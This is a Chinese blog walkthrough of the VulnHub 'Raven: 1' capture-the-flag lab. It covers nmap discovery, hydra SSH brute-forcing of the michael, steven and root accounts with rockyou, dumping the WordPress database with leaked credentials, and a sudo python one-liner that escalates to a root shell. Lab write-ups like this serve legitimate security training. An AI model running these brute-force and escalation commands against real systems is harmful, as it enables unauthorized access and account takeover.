VulnHub渗透测试之Raven

知乎主页:https://www.zhihu.com/people/back-88-87
靶机地址:https://www.vulnhub.com/entry/raven-1,256/
博客:https://www.swback.cn/

靶机发布日期:2018年8月14日
目标:靶机上存在4个flag

下载下来之后,先使用VMware导入虚拟机
在这里插入图片描述

采用NAT的方式,不知道账号密码。

在这里插入图片描述
通过nmap扫描IP段

nmap 192.168.132.0/24

在这里插入图片描述在这里插入图片描述
访问站点,得到flag1
在这里插入图片描述

扫描目录
发现wordpress目录,进行访问

在这里插入图片描述
通过默认文章发现用户名为michael
在这里插入图片描述

hydra爆破,获得密码

hydra -l michael -P /usr/share/wordlists/rockyou.txt ssh://192.168.132.135

在这里插入图片描述

登录成功查看用户
发现steven用户以及root用户
在这里插入图片描述

网站目录获得flag1
在这里插入图片描述

获得flag2
在这里插入图片描述

在wordpress配置文件发现数据库账号密码
在这里插入图片描述

尝试ssh登录,失败
导出数据库

mysqldump -uroot -pR@v3nSecurity wordpress >1.sql

数据库中发现flag3 和flag4

在这里插入图片描述

获得4个flag之后,基本就结束了,但是还能继续挖一下

查看suid:

find / -user root -perm -4000 -print 2>/dev/null

在这里插入图片描述

查看sudo 权限,。无权限
在这里插入图片描述

登录MySQL 获得网站的后台密码
在这里插入图片描述

拿到kali下使用john破解
指定rockyou的字典
在这里插入图片描述

耗时较长,先破解着、

想起来查看passwd的时候还有两个用户 steven 和root
使用 九头蛇爆破一下

hydra -l steven -P /usr/share/wordlists/rockyou.txt ssh://192.168.132.135
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.132.135

获得steven的密码为pink84

ssh登录
查看权限
在这里插入图片描述

发现python可以执行root权限
python提权
查看下python版本及目录
在这里插入图片描述

命令执行失败,忘记使用sudo。。

sudo python -c 'import os; os.system("/bin/sh")'

提权成功
在这里插入图片描述

两种都可以
在这里插入图片描述

查看shadow
在这里插入图片描述

后面查看源码可以发现网站目录下面除了一个备份文件还有.DS_Store源码泄露

而且可以看到flag4之前查看的应该是个意外
正常应该是在root目录下面才能查看到
++++++++++++++++++++++++++++++++++++++++++++++++++++++

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)](https://download.csdn.net/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

SwBack

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值